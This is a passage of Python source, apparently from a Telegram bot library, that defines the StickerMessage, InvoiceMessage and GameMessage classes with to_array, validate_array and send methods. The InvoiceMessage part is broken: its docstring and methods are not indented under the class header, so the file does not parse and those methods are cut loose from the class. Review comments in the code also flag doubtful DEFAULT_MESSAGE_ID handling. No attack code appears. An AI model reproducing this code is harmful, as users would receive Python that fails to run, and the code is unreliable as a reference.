            array['reply_markup'] = self.reply_markup.to_array()  # type ForceReply
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the StickerMessage constructor.

        :return: new array with valid values
        :rtype: dict
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        data = super(StickerMessage, StickerMessage).validate_array(array)
        if isinstance(array.get('sticker'), InputFile):
            data['sticker'] = InputFile.from_array(array.get('sticker'))
        elif isinstance(array.get('sticker'), str):
            data['sticker'] = u(array.get('sticker'))
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        if array.get('reply_to_message_id') is None:
            data['reply_id'] = None
        elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
            # NOTE(review): this assigns the DEFAULT_MESSAGE_ID sentinel itself, not the
            # incoming value; this appears to be intentional generator output — confirm.
            data['reply_id'] = DEFAULT_MESSAGE_ID
        elif isinstance(array.get('reply_to_message_id'), int):
            data['reply_id'] = int(array.get('reply_to_message_id'))
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
        data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
        if array.get('reply_markup') is None:
            data['reply_markup'] = None
        elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
            data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
            data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
            data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ForceReply):
            data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
        # end if
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new StickerMessage from a given dictionary.

        :return: new StickerMessage instance, or None if the input was None or empty.
        :rtype: StickerMessage | None
        """
        if not array:  # None or {}
            return None
        # end if
        data = StickerMessage.validate_array(array)
        return StickerMessage(**data)
    # end def from_array

    def __str__(self):
        """
        Implements `str(stickermessage_instance)`
        """
        return "StickerMessage(sticker={self.sticker!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(stickermessage_instance)`
        """
        return "StickerMessage(sticker={self.sticker!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in stickermessage_instance`
        """
        return (
            key in ["sticker", "receiver", "reply_id", "disable_notification", "allow_sending_without_reply", "reply_markup"]
            and hasattr(self, key)
            and bool(getattr(self, key, None))
        )
    # end def __contains__
# end class StickerMessage
class InvoiceMessage(ReturnableMessageBase):
"""
Use this method to send invoices. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendinvoice
Parameters:
:param title: Product name, 1-32 characters
:type title: str|unicode
:param description: Product description, 1-255 characters
:type description: str|unicode
:param payload: Bot-defined invoice payload, 1-128 bytes. This will not be displayed to the user, use for your internal processes.
:type payload: str|unicode
:param provider_token: Payments provider token, obtained via Botfather
:type provider_token: str|unicode
:param currency: Three-letter ISO 4217 currency code, see more on currencies
:type currency: str|unicode
:param prices: Price breakdown, a JSON-serialized list of components (e.g. product price, tax, discount, delivery cost, delivery tax, bonus, etc.)
:type prices: list of pytgbot.api_types.sendable.payments.LabeledPrice
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param max_tip_amount: The maximum accepted amount for tips in the smallest units of the currency (integer, not float/double). For example, for a maximum tip of US$ 1.45 pass max_tip_amount = 145. See the exp parameter in currencies.json, it shows the number of digits past the decimal point for each currency (2 for the majority of currencies). Defaults to 0
:type max_tip_amount: int
:param suggested_tip_amounts: A JSON-serialized array of suggested amounts of tips in the smallest units of the currency (integer, not float/double). At most 4 suggested tip amounts can be specified. The suggested tip amounts must be positive, passed in a strictly increased order and must not exceed max_tip_amount.
:type suggested_tip_amounts: list of int
:param start_parameter: Unique deep-linking parameter. If left empty, forwarded copies of the sent message will have a Pay button, allowing multiple users to pay directly from the forwarded message, using the same invoice. If non-empty, forwarded copies of the sent message will have a URL button with a deep link to the bot (instead of a Pay button), with the value used as the start parameter
:type start_parameter: str|unicode
:param provider_data: A JSON-serialized data about the invoice, which will be shared with the payment provider. A detailed description of required fields should be provided by the payment provider.
:type provider_data: str|unicode
:param photo_url: URL of the product photo for the invoice. Can be a photo of the goods or a marketing image for a service. People like it better when they see what they are paying for.
:type photo_url: str|unicode
:param photo_size: Photo size
:type photo_size: int
:param photo_width: Photo width
:type photo_width: int
:param photo_height: Photo height
:type photo_height: int
:param need_name: Pass True, if you require the user's full name to complete the order
:type need_name: bool
:param need_phone_number: Pass True, if you require the user's phone number to complete the order
:type need_phone_number: bool
:param need_email: Pass True, if you require the user's email address to complete the order
:type need_email: bool
:param need_shipping_address: Pass True, if you require the user's shipping address to complete the order
:type need_shipping_address: bool
:param send_phone_number_to_provider: Pass True, if user's phone number should be sent to provider
:type send_phone_number_to_provider: bool
:param send_email_to_provider: Pass True, if user's email address should be sent to provider
:type send_email_to_provider: bool
:param is_flexible: Pass True, if the final price depends on the shipping method
:type is_flexible: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: A JSON-serialized object for an inline keyboard. If empty, one 'Pay total price' button will be shown. If not empty, the first button must be a Pay button.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup
"""
def __init__(self, title, description, payload, provider_token, currency, prices, receiver=None, reply_id=DEFAULT_MESSAGE_ID, max_tip_amount=None, suggested_tip_amounts=None, start_parameter=None, provider_data=None, photo_url=None, photo_size=None, photo_width=None, photo_height=None, need_name=None, need_phone_number=None, need_email=None, need_shipping_address=None, send_phone_number_to_provider=None, send_email_to_provider=None, is_flexible=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
    """
    Use this method to send invoices. On success, the sent Message is returned.

    https://core.telegram.org/bots/api#sendinvoice

    Required parameters: title (product name, 1-32 characters), description
    (1-255 characters), payload (bot-defined, 1-128 bytes, not shown to the
    user), provider_token (obtained via Botfather), currency (three-letter
    ISO 4217 code) and prices (list of
    pytgbot.api_types.sendable.payments.LabeledPrice).

    Optional keyword parameters: receiver (overrides the automatic chat_id),
    reply_id (overrides reply_to_message_id), max_tip_amount and
    suggested_tip_amounts (tips in the smallest currency units),
    start_parameter (deep-linking), provider_data (JSON shared with the
    payment provider), photo_url / photo_size / photo_width / photo_height
    (product photo), the need_name / need_phone_number / need_email /
    need_shipping_address / send_phone_number_to_provider /
    send_email_to_provider / is_flexible checkout flags,
    disable_notification, allow_sending_without_reply, and reply_markup
    (an InlineKeyboardMarkup; if set, the first button must be a Pay button).
    """
    super(InvoiceMessage, self).__init__()
    from pytgbot.api_types.sendable.payments import LabeledPrice
    from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup

    # Validate every argument first (in signature order, so the first failing
    # check is the same one the caller would have hit before), then assign.
    assert_type_or_raise(title, unicode_type, parameter_name="title")
    assert_type_or_raise(description, unicode_type, parameter_name="description")
    assert_type_or_raise(payload, unicode_type, parameter_name="payload")
    assert_type_or_raise(provider_token, unicode_type, parameter_name="provider_token")
    assert_type_or_raise(currency, unicode_type, parameter_name="currency")
    assert_type_or_raise(prices, list, parameter_name="prices")
    assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
    assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
    assert_type_or_raise(max_tip_amount, None, int, parameter_name="max_tip_amount")
    assert_type_or_raise(suggested_tip_amounts, None, list, parameter_name="suggested_tip_amounts")
    assert_type_or_raise(start_parameter, None, unicode_type, parameter_name="start_parameter")
    assert_type_or_raise(provider_data, None, unicode_type, parameter_name="provider_data")
    assert_type_or_raise(photo_url, None, unicode_type, parameter_name="photo_url")
    assert_type_or_raise(photo_size, None, int, parameter_name="photo_size")
    assert_type_or_raise(photo_width, None, int, parameter_name="photo_width")
    assert_type_or_raise(photo_height, None, int, parameter_name="photo_height")
    assert_type_or_raise(need_name, None, bool, parameter_name="need_name")
    assert_type_or_raise(need_phone_number, None, bool, parameter_name="need_phone_number")
    assert_type_or_raise(need_email, None, bool, parameter_name="need_email")
    assert_type_or_raise(need_shipping_address, None, bool, parameter_name="need_shipping_address")
    assert_type_or_raise(send_phone_number_to_provider, None, bool, parameter_name="send_phone_number_to_provider")
    assert_type_or_raise(send_email_to_provider, None, bool, parameter_name="send_email_to_provider")
    assert_type_or_raise(is_flexible, None, bool, parameter_name="is_flexible")
    assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
    assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
    assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, parameter_name="reply_markup")

    self.title = title
    self.description = description
    self.payload = payload
    self.provider_token = provider_token
    self.currency = currency
    self.prices = prices
    self.receiver = receiver
    self.reply_id = reply_id
    self.max_tip_amount = max_tip_amount
    self.suggested_tip_amounts = suggested_tip_amounts
    self.start_parameter = start_parameter
    self.provider_data = provider_data
    self.photo_url = photo_url
    self.photo_size = photo_size
    self.photo_width = photo_width
    self.photo_height = photo_height
    self.need_name = need_name
    self.need_phone_number = need_phone_number
    self.need_email = need_email
    self.need_shipping_address = need_shipping_address
    self.send_phone_number_to_provider = send_phone_number_to_provider
    self.send_email_to_provider = send_email_to_provider
    self.is_flexible = is_flexible
    self.disable_notification = disable_notification
    self.allow_sending_without_reply = allow_sending_without_reply
    self.reply_markup = reply_markup

    # custom variable for message chaining
    self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
    """
    Send the message via pytgbot.

    :param sender: The bot instance to send with.
    :type  sender: pytgbot.bot.Bot

    :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
    :type  ignore_reply: bool

    :rtype: PytgbotApiMessage
    """
    # Map each stored field onto the parameter name send_invoice() expects,
    # then fire the call in one go.
    invoice_kwargs = dict(
        title=self.title,
        description=self.description,
        payload=self.payload,
        provider_token=self.provider_token,
        currency=self.currency,
        prices=self.prices,
        chat_id=self.receiver,
        reply_to_message_id=self.reply_id,
        max_tip_amount=self.max_tip_amount,
        suggested_tip_amounts=self.suggested_tip_amounts,
        start_parameter=self.start_parameter,
        provider_data=self.provider_data,
        photo_url=self.photo_url,
        photo_size=self.photo_size,
        photo_width=self.photo_width,
        photo_height=self.photo_height,
        need_name=self.need_name,
        need_phone_number=self.need_phone_number,
        need_email=self.need_email,
        need_shipping_address=self.need_shipping_address,
        send_phone_number_to_provider=self.send_phone_number_to_provider,
        send_email_to_provider=self.send_email_to_provider,
        is_flexible=self.is_flexible,
        disable_notification=self.disable_notification,
        allow_sending_without_reply=self.allow_sending_without_reply,
        reply_markup=self.reply_markup,
    )
    return sender.send_invoice(**invoice_kwargs)
# end def actual_send
def to_array(self):
    """
    Serializes this InvoiceMessage to a dictionary.

    Required fields are always written. Optional fields are written only when
    they are set: the previous implementation applied ``int()``/``u()``/
    ``.to_array()`` unconditionally and crashed with ``TypeError`` or
    ``AttributeError`` whenever an optional was left at its default of None
    (and raised for ``receiver=None``, which ``__init__`` explicitly allows).

    :return: dictionary representation of this object.
    :rtype: dict
    """
    array = super(InvoiceMessage, self).to_array()

    # required fields
    array['title'] = u(self.title)  # py2: type unicode, py3: type str
    array['description'] = u(self.description)  # py2: type unicode, py3: type str
    array['payload'] = u(self.payload)  # py2: type unicode, py3: type str
    array['provider_token'] = u(self.provider_token)  # py2: type unicode, py3: type str
    array['currency'] = u(self.currency)  # py2: type unicode, py3: type str
    # NOTE(review): kept from the original — serializes a list of LabeledPrice
    # via PytgbotApiBot._as_array; confirm this helper is the intended one.
    array['prices'] = PytgbotApiBot._as_array(self.prices)  # type list of LabeledPrice

    # receiver may legitimately be None (filled in by the framework later);
    # only serialize it when actually set.
    if self.receiver is not None:
        if isinstance(self.receiver, str):
            array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
        elif isinstance(self.receiver, int):
            array['chat_id'] = int(self.receiver)  # type int
        else:
            raise TypeError('Unknown type, must be one of str, int.')
        # end if
    # end if

    # NOTE(review): when reply_id is the sentinel default (the DEFAULT_MESSAGE_ID
    # class itself), it may match neither branch below — confirm the sentinel's
    # semantics against the framework before relying on this path.
    if self.reply_id is not None:
        if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
            array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
        elif isinstance(self.reply_id, int):
            array['reply_to_message_id'] = int(self.reply_id)  # type int
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
        # end if
    # end if

    # optional fields — mirror validate_array()'s None handling so that an
    # object with unset optionals round-trips instead of crashing.
    if self.max_tip_amount is not None:
        array['max_tip_amount'] = int(self.max_tip_amount)  # type int
    # end if
    if self.suggested_tip_amounts is not None:
        array['suggested_tip_amounts'] = PytgbotApiBot._as_array(self.suggested_tip_amounts)  # type list of int
    # end if
    if self.start_parameter is not None:
        array['start_parameter'] = u(self.start_parameter)  # py2: type unicode, py3: type str
    # end if
    if self.provider_data is not None:
        array['provider_data'] = u(self.provider_data)  # py2: type unicode, py3: type str
    # end if
    if self.photo_url is not None:
        array['photo_url'] = u(self.photo_url)  # py2: type unicode, py3: type str
    # end if
    if self.photo_size is not None:
        array['photo_size'] = int(self.photo_size)  # type int
    # end if
    if self.photo_width is not None:
        array['photo_width'] = int(self.photo_width)  # type int
    # end if
    if self.photo_height is not None:
        array['photo_height'] = int(self.photo_height)  # type int
    # end if
    if self.need_name is not None:
        array['need_name'] = bool(self.need_name)  # type bool
    # end if
    if self.need_phone_number is not None:
        array['need_phone_number'] = bool(self.need_phone_number)  # type bool
    # end if
    if self.need_email is not None:
        array['need_email'] = bool(self.need_email)  # type bool
    # end if
    if self.need_shipping_address is not None:
        array['need_shipping_address'] = bool(self.need_shipping_address)  # type bool
    # end if
    if self.send_phone_number_to_provider is not None:
        array['send_phone_number_to_provider'] = bool(self.send_phone_number_to_provider)  # type bool
    # end if
    if self.send_email_to_provider is not None:
        array['send_email_to_provider'] = bool(self.send_email_to_provider)  # type bool
    # end if
    if self.is_flexible is not None:
        array['is_flexible'] = bool(self.is_flexible)  # type bool
    # end if
    if self.disable_notification is not None:
        array['disable_notification'] = bool(self.disable_notification)  # type bool
    # end if
    if self.allow_sending_without_reply is not None:
        array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
    # end if
    if self.reply_markup is not None:
        array['reply_markup'] = self.reply_markup.to_array()  # type InlineKeyboardMarkup
    # end if
    return array
# end def to_array
@staticmethod
def validate_array(array):
    """
    Builds a new array with valid values for the InvoiceMessage constructor.

    Required keys are converted unconditionally (they are expected to be
    present); optional keys are converted only when their value is not None.

    :param array: serialized dictionary, e.g. as produced by `to_array()`.
    :type  array: dict

    :return: new array with valid values
    :rtype: dict
    """
    assert_type_or_raise(array, dict, parameter_name="array")
    from pytgbot.api_types.sendable.payments import LabeledPrice
    from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
    # let the base class extract the keys it owns first
    data = super(InvoiceMessage, InvoiceMessage).validate_array(array)
    # required fields: u() normalizes to unicode (py2) / str (py3)
    data['title'] = u(array.get('title'))
    data['description'] = u(array.get('description'))
    data['payload'] = u(array.get('payload'))
    data['provider_token'] = u(array.get('provider_token'))
    data['currency'] = u(array.get('currency'))
    data['prices'] = LabeledPrice.from_array_list(array.get('prices'), list_level=1)
    # 'chat_id' maps back to the constructor's 'receiver' parameter
    if array.get('chat_id') is None:
        data['receiver'] = None
    elif isinstance(array.get('chat_id'), str):
        data['receiver'] = u(array.get('chat_id'))
    elif isinstance(array.get('chat_id'), int):
        data['receiver'] = int(array.get('chat_id'))
    else:
        raise TypeError('Unknown type, must be one of str, int or None.')
    # end if
    # 'reply_to_message_id' maps back to the constructor's 'reply_id' parameter
    if array.get('reply_to_message_id') is None:
        data['reply_id'] = None
    elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
        # NOTE(review): this stores the DEFAULT_MESSAGE_ID class itself,
        # discarding the wrapped value — unlike to_array(), which calls
        # DEFAULT_MESSAGE_ID(self.reply_id). Looks like a generator quirk;
        # confirm this is intended before changing it.
        data['reply_id'] = DEFAULT_MESSAGE_ID
    elif isinstance(array.get('reply_to_message_id'), int):
        data['reply_id'] = int(array.get('reply_to_message_id'))
    else:
        raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
    # end if
    # optional fields: convert only when present, otherwise keep None
    data['max_tip_amount'] = int(array.get('max_tip_amount')) if array.get('max_tip_amount') is not None else None
    data['suggested_tip_amounts'] = TgBotApiObject._builtin_from_array_list(required_type=int, value=array.get('suggested_tip_amounts'), list_level=1) if array.get('suggested_tip_amounts') is not None else None
    data['start_parameter'] = u(array.get('start_parameter')) if array.get('start_parameter') is not None else None
    data['provider_data'] = u(array.get('provider_data')) if array.get('provider_data') is not None else None
    data['photo_url'] = u(array.get('photo_url')) if array.get('photo_url') is not None else None
    data['photo_size'] = int(array.get('photo_size')) if array.get('photo_size') is not None else None
    data['photo_width'] = int(array.get('photo_width')) if array.get('photo_width') is not None else None
    data['photo_height'] = int(array.get('photo_height')) if array.get('photo_height') is not None else None
    data['need_name'] = bool(array.get('need_name')) if array.get('need_name') is not None else None
    data['need_phone_number'] = bool(array.get('need_phone_number')) if array.get('need_phone_number') is not None else None
    data['need_email'] = bool(array.get('need_email')) if array.get('need_email') is not None else None
    data['need_shipping_address'] = bool(array.get('need_shipping_address')) if array.get('need_shipping_address') is not None else None
    data['send_phone_number_to_provider'] = bool(array.get('send_phone_number_to_provider')) if array.get('send_phone_number_to_provider') is not None else None
    data['send_email_to_provider'] = bool(array.get('send_email_to_provider')) if array.get('send_email_to_provider') is not None else None
    data['is_flexible'] = bool(array.get('is_flexible')) if array.get('is_flexible') is not None else None
    data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
    data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
    data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup')) if array.get('reply_markup') is not None else None
    return data
# end def validate_array
@staticmethod
def from_array(array):
    """
    Deserialize a new InvoiceMessage from a given dictionary.

    :return: new InvoiceMessage instance.
    :rtype: InvoiceMessage
    """
    # treat both None and an empty dict as "nothing to build"
    if not array:
        return None
    # end if
    return InvoiceMessage(**InvoiceMessage.validate_array(array))
# end def from_array
def __str__(self):
    """
    Implements `str(invoicemessage_instance)`
    """
    # render every field as name=repr(value), in declaration order
    field_names = (
        "title", "description", "payload", "provider_token", "currency", "prices",
        "receiver", "reply_id", "max_tip_amount", "suggested_tip_amounts",
        "start_parameter", "provider_data", "photo_url", "photo_size",
        "photo_width", "photo_height", "need_name", "need_phone_number",
        "need_email", "need_shipping_address", "send_phone_number_to_provider",
        "send_email_to_provider", "is_flexible", "disable_notification",
        "allow_sending_without_reply", "reply_markup",
    )
    rendered = ", ".join(
        "{key}={value!r}".format(key=key, value=getattr(self, key))
        for key in field_names
    )
    return "InvoiceMessage({fields})".format(fields=rendered)
# end def __str__
def __repr__(self):
    """
    Implements `repr(invoicemessage_instance)`
    """
    # same rendering as __str__: name=repr(value) for every field, in order
    field_names = (
        "title", "description", "payload", "provider_token", "currency", "prices",
        "receiver", "reply_id", "max_tip_amount", "suggested_tip_amounts",
        "start_parameter", "provider_data", "photo_url", "photo_size",
        "photo_width", "photo_height", "need_name", "need_phone_number",
        "need_email", "need_shipping_address", "send_phone_number_to_provider",
        "send_email_to_provider", "is_flexible", "disable_notification",
        "allow_sending_without_reply", "reply_markup",
    )
    rendered = ", ".join(
        "{key}={value!r}".format(key=key, value=getattr(self, key))
        for key in field_names
    )
    return "InvoiceMessage({fields})".format(fields=rendered)
# end def __repr__
def __contains__(self, key):
    """
    Implements `"key" in invoicemessage_instance`
    """
    known_fields = (
        "title", "description", "payload", "provider_token", "currency", "prices",
        "receiver", "reply_id", "max_tip_amount", "suggested_tip_amounts",
        "start_parameter", "provider_data", "photo_url", "photo_size",
        "photo_width", "photo_height", "need_name", "need_phone_number",
        "need_email", "need_shipping_address", "send_phone_number_to_provider",
        "send_email_to_provider", "is_flexible", "disable_notification",
        "allow_sending_without_reply", "reply_markup",
    )
    # unknown keys are never "contained"
    if key not in known_fields:
        return False
    # end if
    # a known key counts only when the attribute exists and is truthy
    return hasattr(self, key) and bool(getattr(self, key, None))
# end def __contains__
# end class InvoiceMessage
class GameMessage(ReturnableMessageBase):
    """
    Use this method to send a game. On success, the sent Message is returned.

    https://core.telegram.org/bots/api#sendgame

    Parameters:

    :param game_short_name: Short name of the game, serves as the unique identifier for the game. Set up your games via Botfather.
    :type  game_short_name: str|unicode

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int

    :param disable_notification: Sends the message silently. Users will receive a notification with no sound.
    :type  disable_notification: bool

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
    :type  allow_sending_without_reply: bool

    :param reply_markup: A JSON-serialized object for an inline keyboard. If empty, one 'Play game_title' button will be shown. If not empty, the first button must launch the game.
    :type  reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup
    """

    def __init__(self, game_short_name, receiver=None, reply_id=DEFAULT_MESSAGE_ID, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
        """
        Create a GameMessage. See the class docstring for parameter details.

        :raises TypeError: if any parameter has an unexpected type
                           (via assert_type_or_raise).
        """
        super(GameMessage, self).__init__()
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        assert_type_or_raise(game_short_name, unicode_type, parameter_name="game_short_name")
        self.game_short_name = game_short_name
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
        self.reply_id = reply_id
        assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
        self.disable_notification = disable_notification
        assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
        self.allow_sending_without_reply = allow_sending_without_reply
        assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, parameter_name="reply_markup")
        self.reply_markup = reply_markup
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type  sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
        :type  ignore_reply: bool

        :rtype: PytgbotApiMessage
        """
        return sender.send_game(
            game_short_name=self.game_short_name,
            chat_id=self.receiver,
            reply_to_message_id=self.reply_id,
            disable_notification=self.disable_notification,
            allow_sending_without_reply=self.allow_sending_without_reply,
            reply_markup=self.reply_markup,
        )
    # end def actual_send

    def to_array(self):
        """
        Serializes this GameMessage to a dictionary.

        Required fields are always written. Optional fields are written only
        when set: the previous implementation raised TypeError for
        ``receiver=None`` (which ``__init__`` explicitly allows) and crashed
        with AttributeError on ``self.reply_markup.to_array()`` when
        reply_markup was None.

        :return: dictionary representation of this object.
        :rtype: dict
        """
        array = super(GameMessage, self).to_array()
        # required field
        array['game_short_name'] = u(self.game_short_name)  # py2: type unicode, py3: type str
        # receiver may legitimately be None; only serialize when set
        if self.receiver is not None:
            if isinstance(self.receiver, str):
                array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
            elif isinstance(self.receiver, int):
                array['chat_id'] = int(self.receiver)  # type int
            else:
                raise TypeError('Unknown type, must be one of str, int.')
            # end if
        # end if
        # NOTE(review): when reply_id is the sentinel default (the
        # DEFAULT_MESSAGE_ID class itself), it may match neither branch —
        # confirm the sentinel's semantics against the framework.
        if self.reply_id is not None:
            if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
                array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
            elif isinstance(self.reply_id, int):
                array['reply_to_message_id'] = int(self.reply_id)  # type int
            else:
                raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
            # end if
        # end if
        # optional fields — mirror validate_array()'s None handling
        if self.disable_notification is not None:
            array['disable_notification'] = bool(self.disable_notification)  # type bool
        # end if
        if self.allow_sending_without_reply is not None:
            array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
        # end if
        if self.reply_markup is not None:
            array['reply_markup'] = self.reply_markup.to_array()  # type InlineKeyboardMarkup
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the GameMessage constructor.

        :param array: serialized dictionary, e.g. as produced by `to_array()`.
        :type  array: dict

        :return: new array with valid values
        :rtype: dict
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        data = super(GameMessage, GameMessage).validate_array(array)
        data['game_short_name'] = u(array.get('game_short_name'))
        # 'chat_id' maps back to the constructor's 'receiver' parameter
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        # 'reply_to_message_id' maps back to the constructor's 'reply_id' parameter
        if array.get('reply_to_message_id') is None:
            data['reply_id'] = None
        elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
            # NOTE(review): stores the DEFAULT_MESSAGE_ID class itself,
            # discarding the wrapped value — kept as-is (generator quirk?);
            # confirm intended before changing.
            data['reply_id'] = DEFAULT_MESSAGE_ID
        elif isinstance(array.get('reply_to_message_id'), int):
            data['reply_id'] = int(array.get('reply_to_message_id'))
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        # optional fields: convert only when present, otherwise keep None
        data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
        data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
        data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup')) if array.get('reply_markup') is not None else None
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new GameMessage from a given dictionary.

        :return: new GameMessage instance, or None for empty input.
        :rtype: GameMessage
        """
        if not array:  # None or {}
            return None
        # end if
        return GameMessage(**GameMessage.validate_array(array))
    # end def from_array

    def __str__(self):
        """
        Implements `str(gamemessage_instance)`
        """
        return "GameMessage(game_short_name={self.game_short_name!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(gamemessage_instance)`
        """
        return "GameMessage(game_short_name={self.game_short_name!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in gamemessage_instance`
        """
        # a known key counts only when the attribute exists and is truthy
        return (
            key in ["game_short_name", "receiver", "reply_id", "disable_notification", "allow_sending_without_reply", "reply_markup"]
            and hasattr(self, key)
            and bool(getattr(self, key, None))
        )
